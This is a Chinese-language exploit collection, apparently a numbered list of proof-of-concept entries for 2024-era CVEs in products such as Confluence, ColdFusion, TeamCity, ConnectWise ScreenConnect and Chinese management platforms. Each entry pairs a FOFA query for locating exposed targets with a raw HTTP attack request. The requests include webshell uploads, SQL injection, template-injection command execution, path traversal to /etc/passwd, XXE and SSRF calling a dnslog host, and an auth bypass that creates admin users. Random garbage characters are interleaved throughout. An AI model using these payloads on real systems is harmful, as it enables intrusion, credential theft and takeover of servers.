. {& U. x' l( S7 Y1 B: E0 I5 \User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko' Y: \# u# ^( V h. h E) M, s- {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
M" _$ e+ j; x% \# ]1 n* Y' r {9 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 p* v& ^ h) q8 LAccept-Encoding: gzip, deflate
5 |; C) x% K0 @! z8 Z; |Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
& x4 Q% _ J6 a- H2 J- X; \/ m+ AContent-Length: 597
; d6 r2 c) G* {5 f2 c0 M& g( oOrigin: https://ip:port
; t( z+ u5 o$ U1 {6 K! ~/ Z! }3 `2 `Referer: https://ip:port/sysmanage/licence.php9 Y x4 Q" `" F; i1 E6 _, V g* e
Upgrade-Insecure-Requests: 12 a, j5 H7 }8 h
Sec-Fetch-Dest: document
( |; C% y6 {) s+ o3 z6 _Sec-Fetch-Mode: navigate4 }9 V% O a2 _3 L3 n
Sec-Fetch-Site: same-origin" D$ W/ A$ Y* F8 q$ B2 K
Sec-Fetch-User: ?1
- U% \, n _3 ^0 H$ F; Y8 fTe: trailers
2 _& x' e3 g! Z( m5 U) O' p" yConnection: close
5 \7 p. y% B/ b% X- B! Y7 k1 d8 i- c2 L( }* |$ ?
-----------------------------42328904123665875270630079328
; a* C, N- R0 N5 RContent-Disposition: form-data; name="file_upload"; filename="2.php"4 v \- N! A4 H) S) s
Content-Type: application/octet-stream% J$ s& v3 u$ Y8 n4 @% R: p' Z
! `+ O8 l- R( K* O2 x* z% c/ M
<?php phpinfo()?>" Q. y& K* w8 y. v) I3 f
-----------------------------42328904123665875270630079328/ {* c# g3 D- ^0 {3 c; G9 R) ?
Content-Disposition: form-data; name="id_type"
$ G* x( Q6 y* D# m0 N" |# O: b: o9 V7 ~
1
: r8 Z; K% H' `. w* E" a i-----------------------------42328904123665875270630079328; Y: @( g1 g# h5 y6 }- ]& e2 \
Content-Disposition: form-data; name="1_ck"
7 Q7 w- h# k3 E' K: f1 N' M# C0 e: R2 }% }- I5 J: R6 J+ ?5 F* a
1_radhttp1 p: _1 o8 P8 z7 W
-----------------------------42328904123665875270630079328. y8 M# v1 o6 X$ v4 x4 ^2 H
Content-Disposition: form-data; name="mode"" R1 U- {( j5 x; F* r. X
~- v* O# M* [% m( _: @: gimport# Y3 t& F5 M5 r8 H% x8 \* T6 v1 I
-----------------------------42328904123665875270630079328$ q, N/ y6 O: k! h2 w
4 b" [# O% b2 p! i1 r: d
8 W$ t3 [8 c6 k! s2 ?. d文件路径/upload/2.php
9 U* y2 e; }6 @" @ s* K7 q9 J
121. 北京百绰智能S42管理平台userattestation.php任意文件上传% y. E3 R5 L$ A( s- ]: v- h1 m
CVE-2024-1918
" L4 |: A; s4 sFOFA:title="Smart管理平台"
; {3 _" h, K$ T* e/ LPOST /useratte/userattestation.php HTTP/1.1% U2 z- N1 O- X+ d4 y' o4 k
Host: 192.168.40.130:8443
+ |+ O5 H& C& a' R; [1 @Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50/ D6 g" w& O3 b% a) R6 |! N
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
# {' h; D2 V% k8 ?7 u. |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 x A6 U* V% a% h) B# Y8 ]! X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# C2 r4 `( V1 b0 T. n2 J% |
Accept-Encoding: gzip, deflate) b4 I$ [$ [9 x8 P' \
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328/ O. n0 a t' {+ T) c' c" \
Content-Length: 592( y7 y1 F) c7 ]" h
Origin: https://192.168.40.130:8443 a3 [& y) O$ \
Upgrade-Insecure-Requests: 1( i9 d- D5 l. Q1 d
Sec-Fetch-Dest: document
0 Z8 h5 M5 r- G# @- aSec-Fetch-Mode: navigate
- z' W; T" W) j+ Y) q( _+ {Sec-Fetch-Site: same-origin V8 ?( J& r; n
Sec-Fetch-User: ?1
' p: n# T- X/ S$ ]Te: trailers
- o4 @1 J% O9 I" xConnection: close1 w) q/ K0 z& Z+ y( E
; K7 |& c8 x% y0 R: p$ a" Z-----------------------------42328904123665875270630079328
6 M/ T! w: m+ V) MContent-Disposition: form-data; name="web_img"; filename="1.php"
+ _* E7 ]2 j/ i+ [Content-Type: application/octet-stream
4 u+ @+ ^# A$ \2 ]# O! c4 C% A' d$ c z$ P. [
<?php phpinfo();?>
' I3 V9 i; i' n- I' h-----------------------------42328904123665875270630079328
2 r9 Y7 w/ t! F, K' ? d) xContent-Disposition: form-data; name="id_type") m* @+ y6 J; C7 r: ^& V: x
! F2 Z, B5 P; [% K$ D
1
+ ]8 N5 r2 P4 `/ X* s/ w; w' v( q& E-----------------------------42328904123665875270630079328
+ @ v Y( E9 G; X8 C6 {, ]9 x9 LContent-Disposition: form-data; name="1_ck"" e: K6 f0 [: T# u" m
9 p3 T2 P% N3 y: Z, s
1_radhttp
9 i7 C+ X4 r6 R6 i; u-----------------------------42328904123665875270630079328: P/ h) L. a; I
Content-Disposition: form-data; name="hidwel"
. g' i& S3 w. q" A2 w- k4 D; n1 F. Y0 W
set
" y" Y$ u p& [-----------------------------42328904123665875270630079328$ Q+ r4 k" q; K& M; Z) a
2 f7 C3 X, a* s8 ]# y3 L2 Y8 K& b1 X+ H$ l
boot/web/upload/weblogo/1.php5 d$ }) \! B% {. P+ H
' B* ^) S2 j% b) z& F. J$ Y7 W
122. 北京百绰智能s200管理平台/importexport.php sql注入
$ F$ `! L# r' nCVE-2024-27718FOFA:title="Smart管理平台"
& `$ Q; Z" s6 ]6 d4 D) x0 p其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
( ^+ m% A( [# B3 |: Z" LGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
h& Y9 R, t6 d; ]+ aHost: x.x.x.x
, N( d% |; p( Y) i, |2 p0 r7 {- sCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc08 _% V' n9 I5 @5 R$ C% T k B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! f* R& |+ W3 O1 _& K* S# J$ g: K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ s7 r0 ]/ P2 v) [) m2 K; vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 Q6 Y! w' x9 RAccept-Encoding: gzip, deflate, br
8 T) j! S% K+ y3 V: HUpgrade-Insecure-Requests: 1) T2 r; {8 b# T; `7 `7 h5 e
Sec-Fetch-Dest: document
' W' U; X, |( }" OSec-Fetch-Mode: navigate" Q! z: k! r4 h
Sec-Fetch-Site: none
* g3 l" Z& }6 PSec-Fetch-User: ?1
0 f& |. d9 [* m7 u7 W3 UTe: trailers
# p- |# w) M5 j5 m% l% HConnection: close
# t |, o* ^# A; x' H9 y2 B2 K" |! x# V: q* O3 _% v
! W% h3 r: ]- o' W7 s
123. Atlassian Confluence 模板注入代码执行4 w* ?: T0 ~7 v7 m
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"" y* N2 y, o5 t D2 ]
POST /template/aui/text-inline.vm HTTP/1.1
* i: W4 o8 K7 i/ L9 O. XHost: localhost:80901 d0 F6 B6 I7 g+ @- w
Accept-Encoding: gzip, deflate, br4 r$ L! b3 I0 m; t4 m7 Q
Accept: */*
0 v; n" m( u4 k6 ~* kAccept-Language: en-US;q=0.9,en;q=0.8% F' s# J. }$ ?+ q0 u) g8 w+ D& M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
$ z$ ?. J% B$ F: z7 l; YConnection: close
3 Q: n) M% l* q4 n$ ^' r! NContent-Type: application/x-www-form-urlencoded0 C& ~. X( `/ C# |2 S ^ {* v O3 g
8 F3 `" J& T* [! u: blabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))4 d& j; v* k3 j! x P! w
( p( ^* l- p$ W6 O8 b% v5 N
5 _7 s6 @8 B$ u8 R124. 湖南建研工程质量检测系统任意文件上传' A6 F) g3 n d$ E" K% j
FOFA:body="/Content/Theme/Standard/webSite/login.css"
0 ^3 ^9 h8 e7 E( ~$ wPOST /Scripts/admintool?type=updatefile HTTP/1.1
$ }7 b. ~' M4 z7 ?7 [( \: {* IHost: 192.168.40.130:8282
+ L2 g4 o: X3 Y/ h9 }6 }# @% FUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36) m4 E! }' ` \" A+ [, K* t
Content-Length: 72
* E8 d: {5 \* |; hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.81 e1 n/ t1 d. J
Accept-Encoding: gzip, deflate, br
! e6 y- u" I1 b; H; `" b1 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: [6 G0 Z% C5 r; c
Connection: close* W7 {; e# D/ [
Content-Type: application/x-www-form-urlencoded
0 `* w3 \, r; y9 y2 Y! c8 H- V
$ C5 T; ?' c3 ?0 j, X# N8 X0 pfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
1 {, u7 r/ |, P3 a t
( c' j9 o8 D' U1 M1 R) y. ~: N- |. i
- W8 y2 I% t: i( X6 A0 c' M& S# vhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
. J# ?$ O4 `- c. G8 J A: k
" T' d: v! t; w6 x7 X2 R125. ConnectWise ScreenConnect身份验证绕过
% Y# b# Z; ~8 E: c: g0 {& S9 CCVE-2024-1709
2 e' N( f- x. R0 @0 j) eFOFA:icon_hash="-82958153"7 {; X: \7 C* |7 H9 q; V: u h
https://github.com/watchtowrlabs ... bypass-add-user-poc
. K& X" f' r8 N9 \" C6 ]: H1 q& V1 X9 {- Y1 a0 b4 v1 G* b U
, o5 M6 T* W( v' p$ r i, ~" S使用方法5 R0 O C2 V. s, f
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
) A; F$ I8 g9 L" z
; J0 E# u4 F8 d" v- V2 ~* z& V1 D. Z/ C4 j! L0 E
创建好用户后直接登录后台,可以执行系统命令。- u4 a e# y2 v- K
8 Y( H6 ]6 T6 d$ y8 _126. Aiohttp 路径遍历* F. ]* v g Z0 w# v
FOFA:title=="ComfyUI"
B2 q' y; N$ iGET /static/../../../../../etc/passwd HTTP/1.1
" C* R; M$ j' Y& {9 lHost: x.x.x.x+ v# s1 H% U+ U$ \( o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36! U% M E- _3 G6 `/ G5 b
Connection: close
: }4 }2 b( d9 H2 oAccept: */*
, o/ s6 a" C* `Accept-Language: en
: X9 |! Q& Y& ^/ c. \' dAccept-Encoding: gzip1 R5 R& G' J6 V3 z1 G# v6 o+ z; G- W
7 ]* C3 r1 P' k6 l0 s. }% D2 h) |- }' i4 g
127. 广联达Linkworks DataExchange.ashx XXE
; S, E- H& ~- T! H9 BFOFA:body="Services/Identification/login.ashx"
' B' P; R) {% e1 ]8 u% zPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
- R0 e W2 O8 S$ V$ FHost: 192.168.40.130:8888
* x. ^, o8 X8 ^7 }) E) f+ f1 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36* c0 k3 W2 ~; N1 Z
Content-Length: 415
. U$ t+ T% u7 q2 U5 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
`6 g, e; L" xAccept-Encoding: gzip, deflate8 F. i+ R) a9 _) b% X: b
Accept-Language: zh-CN,zh;q=0.9
3 ?1 O" \5 v3 }$ W* G3 bConnection: close& s( q0 E' q! \. U+ Z
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
& W! ~" C* x! l5 vPurpose: prefetch
( ^; n* k8 r/ K3 p. qSec-Purpose: prefetch;prerender
! [" A6 b3 }3 |4 E+ f6 ~. o9 K- R5 ]
------WebKitFormBoundaryJGgV5l5ta05yAIe0: H( z+ i& a6 { S
Content-Disposition: form-data;name="SystemName"
$ u- E, }) v5 o5 n% W
0 p% A& `; _5 y2 D; n; H M1 s2 OBIM3 v: b" P0 P4 D$ d" U
------WebKitFormBoundaryJGgV5l5ta05yAIe0( ~3 w, K1 t0 a/ S6 {
Content-Disposition: form-data;name="Params"7 B+ C) g3 v7 R# x- F1 O% |9 Y
Content-Type: text/plain0 \) a( Z; E0 I" n8 q
2 n. h( h0 x. }; x
<?xml version="1.0" encoding="UTF-8"?>: O, W7 W ^% @# w4 w2 ^% W
<!DOCTYPE test [
6 A; f0 ]+ U. ^/ y" \8 \& B" z<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">% Z4 r7 ?- P! Q( H) B- m
]# J$ O" R" H, i# c- q. V
>
' G% J) V* u/ o3 K<test>&t;</test>3 B' W! ]+ D0 Q7 R1 ?* Q# g; p! O
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
7 K" E$ s o( a# |, Y6 D' h
% n3 F4 ]+ W7 ?) S* A' {! J( b' C/ V' D$ N5 W
$ a3 h! `5 e: X; x
128. Adobe ColdFusion 反序列化
% g5 u0 \) l, G$ V) o4 Q1 _ FCVE-2023-38203
$ T- c( b5 K& a# WAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
& l2 B% T- L# G! ?' G" Q( ^FOFA:app="Adobe-ColdFusion"/ W! d+ W+ e+ O6 m# @
PAYLOAD
/ L. U7 r: G+ @" t* p1 {- s/ C, }+ T8 N7 C# h& N& C: Q" T
129. Adobe ColdFusion 任意文件读取
9 e5 V4 e- n4 `& z% u- ]CVE-2024-20767
3 [# `! i4 q4 y* L" `$ V! NFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
$ e1 [* E+ @/ B" z第一步,获取uuid
3 N" s9 q+ F- ^ ZGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
& @; r/ R( W# t( I8 sHost: x.x.x.x+ B3 _+ D2 c) C$ @" Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 ~ L: i0 a# e9 `6 m; F
Accept: */*# y1 F( f$ o4 }$ W$ v5 R' B
Accept-Encoding: gzip, deflate
* C3 R3 C+ u" w' t* NConnection: close, Z$ k# U/ F7 ?, W9 Z! V# B$ Y5 T
- K$ n% i2 E. T4 M! T
- i# O) m% E' M" R% h8 P- J4 s! Y; Q第二步,读取/etc/passwd文件
' A! [! W8 k: f: d; X" U2 TGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.12 [8 |: n3 n4 Z( @& Y! C( _
Host: x.x.x.x
) f d7 [/ G$ fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" Q! P, j( Q5 ~7 R& ]" Q
Accept: */*6 N: R7 ?# @6 h4 G2 c4 W; C: f
Accept-Encoding: gzip, deflate
- Y. m T# ?* }Connection: close# u1 S8 X- {" |2 t/ T1 ^
uuid: 85f60018-a654-4410-a783-f81cbd5000b92 v! n M5 h4 o2 _ b
0 g1 P4 q% p# T, G
# Z8 x+ f+ @: p5 O: n* t
130. Laykefu客服系统任意文件上传, J" J- B4 e. w: s! p
FOFA:icon_hash="-334624619"
M4 v, J" g; q+ y$ OPOST /admin/users/upavatar.html HTTP/1.1
0 D! z; b" |! w8 S# ]% K# jHost: 127.0.0.14 [$ p+ t9 D. P6 \
Accept: application/json, text/javascript, */*; q=0.01$ z' Y1 u, H% |
X-Requested-With: XMLHttpRequest7 P z' v2 L2 l2 J* ~; W% z
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
# x% D# L8 _2 ]" pContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR) R3 z/ m7 T! I2 N- k
Accept-Encoding: gzip, deflate* m# Z8 t; O% p/ g& t: H( ]0 \& B& K
Accept-Language: zh-CN,zh;q=0.9) c9 g, E# A" J) B) {2 h
Cookie: user_name=1; user_id=3
# E5 [8 G k& ^6 t' k7 j% nConnection: close
4 c L0 y# z6 A/ k* h6 h" T) b' i( |
------WebKitFormBoundary3OCVBiwBVsNuB2kR
) A: V% w; X! x; OContent-Disposition: form-data; name="file"; filename="1.php"
; N1 [/ o6 Z7 sContent-Type: image/png
& A& m. m( i: N7 W' J9 X
* ~$ Y* S" E) e* }<?php phpinfo();@eval($_POST['sec']);?>% c# \* Q9 J5 z/ j
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
! h- h' Z1 w5 z! e9 ]* F% T: |9 n3 ]9 y4 e' c
0 ]3 E0 ^) D) x2 @( d# L _
131. Mini-Tmall <=20231017 SQL注入 T0 G0 \5 P# p* N# p! C8 ]
FOFA:icon_hash="-2087517259"
8 M5 z; \3 a" T3 B* D2 S" @ ]' | t后台地址:http://localhost:8080/tmall/admin0 @- _9 @2 P: s; o1 E6 E
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)1 a* l$ g, P+ T" v
' n' ]: g! X9 Q
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过0 ^1 [' _- s) P& S
CVE-2024-27198
; o: U3 r( X, _# m( J; Q" hFOFA:body="Log in to TeamCity"; c5 m% S# h! N
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
' t; J1 w1 z e4 ^Host: 192.168.40.130:8111- ^4 `. l4 M% y: F7 X% i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; u. k* a7 U' |# Q7 b4 nAccept: */*/ G9 S0 |" x& k/ i# D; ?# q
Content-Type: application/json
2 P$ }2 H* [4 K* {* r+ a uAccept-Encoding: gzip, deflate
( [+ q" u/ h0 t! z& _( ]3 r. c7 z N. I2 h' R2 c) P9 t3 K
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}% l8 [! V% S1 g" E0 O3 K
6 ^2 L0 D4 A7 P0 V! [
) p* }, o5 [+ o
CVE-2024-27199
* o, G( T% _2 Y# E/res/../admin/diagnostic.jsp/ ^' m r" r1 q1 y1 B
/.well-known/acme-challenge/../../admin/diagnostic.jsp
. U: g- Q* U+ d3 I3 ^' z1 M+ S% @/update/../admin/diagnostic.jsp! H. H/ ~" E. w- C" x* ^, x% N
* O4 c' h$ |: f7 D" O5 i; L. e
& _8 p J* C* v1 MCVE-2024-27198-RCE.py& B3 a) l4 D( l; j
* p, y7 U- z; k1 o5 k. H- d
133. H5 云商城 file.php 文件上传. N3 V( U, j/ h8 B, f3 Z
FOFA:body="/public/qbsp.php"
9 A) K# x0 b! Y3 g( @/ rPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1! Z& t* ~8 M4 F6 ^% e
Host: your-ip7 C4 S# y+ f. b& w' Z) C( X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
* ]; S7 E) @6 i/ Y3 h3 OContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx& r* }5 A* K2 c' Z# s
4 Z5 \) c' C8 h( t1 u
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
9 U$ b6 n$ f' G/ SContent-Disposition: form-data; name="file"; filename="rce.php", P7 E+ P3 x5 O4 Q1 F. \2 x+ I: V
Content-Type: application/octet-stream
! g7 X3 `( h0 z# b t8 |8 a 6 y- x* Y3 e, b- g0 H2 R! u" p- g
<?php system("cat /etc/passwd");unlink(__FILE__);?>
7 t. h( X ~- z* \2 V------WebKitFormBoundaryFQqYtrIWb8iBxUCx-- L3 p- n+ [6 s9 q* x6 g' d& p
* W, r+ F% F$ l3 X
; V2 }) A) u, F! g3 {( }9 m
) V; U6 \( K' X1 ?1 A5 t1 r134. 网康NS-ASG应用安全网关index.php sql注入
: V$ P1 c' @ C' CCVE-2024-2330 J, h* z! \, D8 a' K( {
Netentsec NS-ASG Application Security Gateway 6.3版本
$ M! e9 ~9 T) b. A# yFOFA:app="网康科技-NS-ASG安全网关" u% t+ I0 ?7 O2 w& Q4 e
POST /protocol/index.php HTTP/1.1
; c9 `* o/ {! t/ j) oHost: x.x.x.x N& c _0 e4 s/ A* P8 u
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de8 R+ h& V, h, ~0 h }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0& i6 ?$ T8 q: m0 C0 _* V
Accept: */*
' `2 S0 p1 `8 U1 U5 F( L' @1 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 @- q' j* P' v% {3 d9 ~( T
Accept-Encoding: gzip, deflate# A$ M0 `# L7 n1 N( R/ [* c" Z' U
Sec-Fetch-Dest: empty5 M" Y/ E' u4 j
Sec-Fetch-Mode: cors1 Q1 @' X4 e! n7 `9 Q1 `; ?
Sec-Fetch-Site: same-origin
+ t6 V' n( Y1 W9 N0 E2 XTe: trailers3 T* ~6 H- H$ F0 o4 ? k* O
Connection: close& l+ t1 C6 T" ?/ E! v, \8 w$ `
Content-Type: application/x-www-form-urlencoded+ d2 l) h$ l% ]# j# J. ~5 S( `) \
Content-Length: 2632 c/ K; o- J; m. V
3 H( ]7 ]: z$ `, E# M
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}" y0 L/ t- x `6 f. r J6 M
5 w8 _# m0 s9 |/ N0 B- S/ f
+ {: p2 U* r3 F/ C/ h. Y
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
# D8 D& f" L) X" |+ l' x: e; c: DCVE-2024-20222 S1 z6 g) g1 o8 g' }% ~; b' F1 u3 @
Netentsec NS-ASG Application Security Gateway 6.3版本
e" n' A7 S( w( n U8 M' G( TFOFA:app="网康科技-NS-ASG安全网关"
( s4 V% s2 D2 Q2 IGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
1 H$ R. A# h; Z2 PHost: x.x.x.x3 D6 }+ G+ ~9 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. e# |2 I( W$ L' l; H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 g- \/ q5 |! A. D5 | o( SAccept-Encoding: gzip, deflate
& L( @/ K4 m) i1 o) ]: {- P- eAccept-Language: zh-CN,zh;q=0.9
4 y! j2 l, l! O+ P5 L/ BConnection: close
) h. F/ F7 y" z+ j$ f
# v7 R1 h0 ?9 `$ f+ q5 t& Z3 F- ]
. I9 a6 K- U7 l' S136. NextChat cors SSRF [" W" i+ g- Z8 H- h' u2 J
CVE-2023-49785! G! U' R6 v& p9 v* p" b, y
FOFA:title="NextChat"
5 m% w2 b5 z* c; M7 k% B- ~GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1+ U Y- t# J Y7 |# R
Host: x.x.x.x:10000
) [) q, m1 \7 Z0 B- DUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- J; @: l5 m2 u, _; tConnection: close
% R2 h/ Z& c( ]Accept: */*
% c# U) _* K$ G- @7 W6 k! W( |) w8 nAccept-Language: en
" U$ p3 ?4 g/ z4 j( T5 _( pAccept-Encoding: gzip- ?2 b3 n/ ?2 H5 B- _: }( E g0 L
) P X& C* X: Z- T
: \1 C8 W2 w) i
137. 福建科立迅通信指挥调度平台down_file.php sql注入
8 u6 }1 l& c" z4 `" {1 |9 PCVE-2024-2620
1 X9 t+ h8 _* M% _7 I5 VFOFA:body="app/structure/departments.php" || app="指挥调度管理平台". y3 Q2 s# z1 X) U9 ~- P
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
4 B G9 D+ G' GHost: x.x.x.x; v( X4 P: s6 w/ `- I9 m5 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ e/ D" z/ @1 f( cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 R2 S% I' q6 X; K, L6 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 Z7 @# l1 B) t6 `" `
Accept-Encoding: gzip, deflate, br
( Q; ~3 U3 s/ f- `; dConnection: close
; k, s; H* ~ p2 p9 Y* ZCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj1 H" ]7 T$ s* R; K& \/ L8 o: e1 |' |
Upgrade-Insecure-Requests: 18 Q0 l6 a4 a' K% ^, P( C
' E: G8 ~8 Y6 H7 X0 D) S
. {0 _0 `! o% V7 R
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入+ e$ Z& \! G ?1 I) {" Y6 C6 R
CVE-2024-2621& [) b& X8 a" r
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"2 K1 T9 d2 j. m
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1& b- Z/ ^$ P; k& W P0 J! T; a" ^
Host: x.x.x.x
, l% }$ `3 W5 c( cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 P$ n1 c: Z6 F. q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( ^7 p3 x7 t( n+ _* {1 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 `* L2 Q; e/ @6 J
Accept-Encoding: gzip, deflate, br7 k1 t$ a4 ` O7 D" K2 s) ?
Connection: close& t/ i: e7 \# o; `9 h7 O+ g
Upgrade-Insecure-Requests: 1
2 {% o( b, `3 N n4 s+ j! E/ Z; G( P0 b! a) g" j# k* T/ R
T) P0 B' e0 P! F9 M+ {0 Z8 v8 W
139. 福建科立讯通信指挥调度平台editemedia.php sql注入1 ~$ O9 ?) J+ q6 g8 c# z) N8 E
CVE-2024-2622* L/ C( m% h5 \/ P
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 M- Y3 r4 F+ N* c) ^GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
4 K4 h; K9 o2 }: y: G0 b& J& i) QHost: x.x.x.x
2 n- J$ _: z2 v' V* vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 h. k1 Z T/ ^1 z2 \! E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% o; \9 r, b, a, v& @; _6 M. ^% q! NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! o1 h, x; y8 D2 L0 R
